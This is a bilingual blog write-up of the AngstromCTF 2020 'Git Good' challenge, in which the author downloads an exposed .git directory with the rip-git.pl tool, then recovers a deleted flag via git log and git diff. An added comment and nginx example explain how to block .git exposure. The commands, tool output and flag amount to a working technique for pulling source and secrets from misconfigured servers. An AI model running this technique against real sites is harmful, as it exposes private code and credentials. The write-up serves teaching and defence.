はまやんはまやんはまやん

hamayanhamayan's blog

Git Good [AngstromCTF 2020]

https://ctftime.org/task/10758

Japanese version below

Writeup in English

Required Knowledge

  • Git

Writeup

[image: screenshot of the challenge page]

Only this shows up. Even looking at the HTTP response, the only information is that the site runs on Express + nginx. And since it is just index.html, there is nothing unusual to find.

Let's go back to the challenge description.

Did you know that angstrom has a git repo for all the challenges? I noticed that clam committed a very work in progress challenge so I thought it was worth sharing.

The author keeps using the word "git". Is there a way to get at the git data?

[2019] A roundup of attack techniques in CTF Web challenges (reading every Web writeup) - Control-C Control-V
Found it!

kost/dvcs-ripper: Rip web accessible (distributed) version control systems: SVN/GIT/HG...
I use this, and these days the environment can be built with docker. (Great…)

docker run -it k0st/alpine-dvcs-ripper /bin/bash
bash-4.3$

With this it is ready to use. Run the command described in the documentation.

bash-4.3$ rip-git.pl -v -u https://gitgood.2020.chall.actf.co/.git/
[i] Downloading git files from https://gitgood.2020.chall.actf.co/.git/
[i] Auto-detecting 404 as 200 with 3 requests
[i] Getting correct 404 responses
[i] Using session name: zqWbzkQI
[d] found COMMIT_EDITMSG
[d] found config
[d] found description
[d] found HEAD
[d] found index
[!] Not found for packed-refs: 404 Not Found
[!] Not found for objects/info/alternates: 404 Not Found
[!] Not found for info/grafts: 404 Not Found
[d] found logs/HEAD
[d] found objects/6b/3c94c0b90a897f246f0f32dec3f5fd3e40abb5
[d] found objects/e9/75d678f209da09fff763cd297a6ed8dd77bb35
[d] found refs/heads/master
[!] found info file for packs, trying to process them: objects/info/packs
[i] Running git fsck to check for missing items
Checking object directories: 100% (256/256), done.
error: 9402d143d3d7998247c95597b63598ce941e7bcb: invalid sha1 pointer in cache-tree
[d] found objects/c2/658d7d1b31848c3b71960543cb0368e56cd4c7
[d] found objects/63/8887a54973265c428cd51ce6dfd48f196d91c4
[d] found objects/24/7c9d491c0d2d6da5e93afcd0681b3edd7ccd70
[d] found objects/49/b319c37dc674bca682cab0f2506473dda6bd9a
[d] found objects/8f/08af35205d0ba80e94b4f4306311039d62e138
[d] found objects/94/02d143d3d7998247c95597b63598ce941e7bcb
[d] found objects/b6/30430d9d393a6b143af2839fd24ac2118dba79
[d] found objects/78/9fa5caf452f5f6f25bfa9b1c0ab1d593dce1b3
[i] Got items with git fsck: 8, Items fetched: 8
[i] Running git fsck to check for missing items
Checking object directories: 100% (256/256), done.
[d] found objects/0f/52598006f9cdb21db2f4c8d44d70535630289b
[i] Got items with git fsck: 1, Items fetched: 1
[i] Running git fsck to check for missing items
Checking object directories: 100% (256/256), done.
[i] Got items with git fsck: 0, Items fetched: 0
[!] No more items to fetch. That's it!
bash-4.3$ ls
index.html         index.js           package-lock.json  package.json       thisistheflag.txt

Oh, amazing. I really was able to git clone it.

bash-4.3$ cat thisistheflag.txt
There used to be a flag here...

OK. Let's look at the log.

bash-4.3$ git log
commit e975d678f209da09fff763cd297a6ed8dd77bb35
Author: aplet123 <noneof@your.business>
Date:   Sat Mar 7 16:27:44 2020 +0000

    Initial commit

commit 6b3c94c0b90a897f246f0f32dec3f5fd3e40abb5
Author: aplet123 <noneof@your.business>
Date:   Sat Mar 7 16:27:24 2020 +0000

    haha I lied this is the actual initial commit

The latest commit says "Initial commit", but there is a commit before it. I guess the setup is that the commit message was amended.

bash-4.3$ git diff 6b3c94c0b90a897f246f0f32dec3f5fd3e40abb5
[[1mdiff --git a/thisistheflag.txt b/thisistheflag.txt[[m
[[1mindex 0f52598..247c9d4 100644[[m
[[1m--- a/thisistheflag.txt[[m
[[1m+++ b/thisistheflag.txt[[m
[[36m@@ -1,3 +1 @@[[m
[[31m-actf{b3_car3ful_wh4t_y0u_s3rve_wi7h}[[m
[[31m-[[m
[[31m-btw this isn't the actual git server[[m
[[32m+[[m[[32mThere used to be a flag here...[[m
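Review bot: deleting the flag line from thisistheflag.txt in this hunk does not remove it from the repository. The previous blob, 0f52598 in the index line, is still reachable from commit 6b3c94c0, which is exactly what the `git diff` against that commit recovers, and the ripper fetched that very object (objects/0f/52598...) in its last fsck pass. A secret that has ever been committed should be treated as exposed and rotated, and purged by rewriting history rather than deleted in a follow-up commit; on top of that, the `.git` directory must not be reachable through the web server at all.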

It looks garbled, but the flag comes out. The color codes are probably leaking through.
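The flag text, "be careful what you serve with", names the real fix: the web server must never expose the .git directory. The nginx configuration below is an added example written for this page, not something from the challenge or its author; it shows the weak static-file setup beside a corrected one. The server name, document root and upstream port are assumptions.

```nginx
# Added example (not from the challenge). Hostname, root and port are assumed.
# Deploy ONE of the two server blocks; both are shown for comparison.

# WEAK: everything under the document root is served, including a .git
# directory that was deployed next to index.html. rip-git.pl simply fetches
# /.git/HEAD, /.git/index, /.git/objects/... as ordinary static files.
server {
    listen 80;
    server_name gitgood.example.invalid;
    root /var/www/app;

    location / {
        try_files $uri @express;      # static file first, then the Node app
    }
    location @express {
        proxy_pass http://127.0.0.1:3000;
    }
}

# CORRECTED: refuse VCS metadata before the static handler can see it.
# Regex locations take precedence over the "/" prefix location, so these
# match first. Returning 404 (rather than 403) makes a probe look like any
# missing file, so the ripper's 404 detection finds nothing to fetch.
server {
    listen 80;
    server_name gitgood.example.invalid;
    root /var/www/app;

    location ~ /\.(git|svn|hg|bzr)(/|$) {
        return 404;
    }
    # Broader: hide every dot-path except ACME's /.well-known/.
    location ~ /\.(?!well-known/) {
        return 404;
    }

    location / {
        try_files $uri @express;
    }
    location @express {
        proxy_pass http://127.0.0.1:3000;
    }
}
```

These rules are defense in depth; the deployment step should also keep the .git directory out of the document root in the first place.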

Japanese version

Required Knowledge

  • Knowledge of Git

Writeup

[image: screenshot of the challenge page]

Only this shows up. Even looking at the HTTP response, the only information is that it is running on Express + nginx. Besides, it is just index.html, so there is nothing odd to be found.

Let's go back to the challenge description.

Did you know that angstrom has a git repo for all the challenges? I noticed that clam committed a very work in progress challenge so I thought it was worth sharing.

Git is being pushed very hard here. Could there be a way to pull out the git data?

[2019] A roundup of attack techniques in CTF Web challenges (reading every Web writeup) - Control-C Control-V
There is! So you hack things like .git. I see.

kost/dvcs-ripper: Rip web accessible (distributed) version control systems: SVN/GIT/HG...
We use this, and these days the environment can be set up with docker. (Wonderful…)

docker run -it k0st/alpine-dvcs-ripper /bin/bash
bash-4.3$

With this it is ready to use (amazing, the power of modern tooling).
Run the command described in the documentation.

bash-4.3$ rip-git.pl -v -u https://gitgood.2020.chall.actf.co/.git/
[i] Downloading git files from https://gitgood.2020.chall.actf.co/.git/
[i] Auto-detecting 404 as 200 with 3 requests
[i] Getting correct 404 responses
[i] Using session name: zqWbzkQI
[d] found COMMIT_EDITMSG
[d] found config
[d] found description
[d] found HEAD
[d] found index
[!] Not found for packed-refs: 404 Not Found
[!] Not found for objects/info/alternates: 404 Not Found
[!] Not found for info/grafts: 404 Not Found
[d] found logs/HEAD
[d] found objects/6b/3c94c0b90a897f246f0f32dec3f5fd3e40abb5
[d] found objects/e9/75d678f209da09fff763cd297a6ed8dd77bb35
[d] found refs/heads/master
[!] found info file for packs, trying to process them: objects/info/packs
[i] Running git fsck to check for missing items
Checking object directories: 100% (256/256), done.
error: 9402d143d3d7998247c95597b63598ce941e7bcb: invalid sha1 pointer in cache-tree
[d] found objects/c2/658d7d1b31848c3b71960543cb0368e56cd4c7
[d] found objects/63/8887a54973265c428cd51ce6dfd48f196d91c4
[d] found objects/24/7c9d491c0d2d6da5e93afcd0681b3edd7ccd70
[d] found objects/49/b319c37dc674bca682cab0f2506473dda6bd9a
[d] found objects/8f/08af35205d0ba80e94b4f4306311039d62e138
[d] found objects/94/02d143d3d7998247c95597b63598ce941e7bcb
[d] found objects/b6/30430d9d393a6b143af2839fd24ac2118dba79
[d] found objects/78/9fa5caf452f5f6f25bfa9b1c0ab1d593dce1b3
[i] Got items with git fsck: 8, Items fetched: 8
[i] Running git fsck to check for missing items
Checking object directories: 100% (256/256), done.
[d] found objects/0f/52598006f9cdb21db2f4c8d44d70535630289b
[i] Got items with git fsck: 1, Items fetched: 1
[i] Running git fsck to check for missing items
Checking object directories: 100% (256/256), done.
[i] Got items with git fsck: 0, Items fetched: 0
[!] No more items to fetch. That's it!
bash-4.3$ ls
index.html         index.js           package-lock.json  package.json       thisistheflag.txt

Oh, amazing. I really was able to git clone it.

bash-4.3$ cat thisistheflag.txt
There used to be a flag here...

Hmm. Let's look at the log.

bash-4.3$ git log
commit e975d678f209da09fff763cd297a6ed8dd77bb35
Author: aplet123 <noneof@your.business>
Date:   Sat Mar 7 16:27:44 2020 +0000

    Initial commit

commit 6b3c94c0b90a897f246f0f32dec3f5fd3e40abb5
Author: aplet123 <noneof@your.business>
Date:   Sat Mar 7 16:27:24 2020 +0000

    haha I lied this is the actual initial commit

The latest one is "Initial Commit", but there is a commit before it. I guess the setup is that the commit message was amended.

bash-4.3$ git diff 6b3c94c0b90a897f246f0f32dec3f5fd3e40abb5
[[1mdiff --git a/thisistheflag.txt b/thisistheflag.txt[[m
[[1mindex 0f52598..247c9d4 100644[[m
[[1m--- a/thisistheflag.txt[[m
[[1m+++ b/thisistheflag.txt[[m
[[36m@@ -1,3 +1 @@[[m
[[31m-actf{b3_car3ful_wh4t_y0u_s3rve_wi7h}[[m
[[31m-[[m
[[31m-btw this isn't the actual git server[[m
[[32m+[[m[[32mThere used to be a flag here...[[m

It looks garbled, but the flag comes out. The color codes are probably leaking through, but since we've come this far I'd like to see it properly. What should I view it with?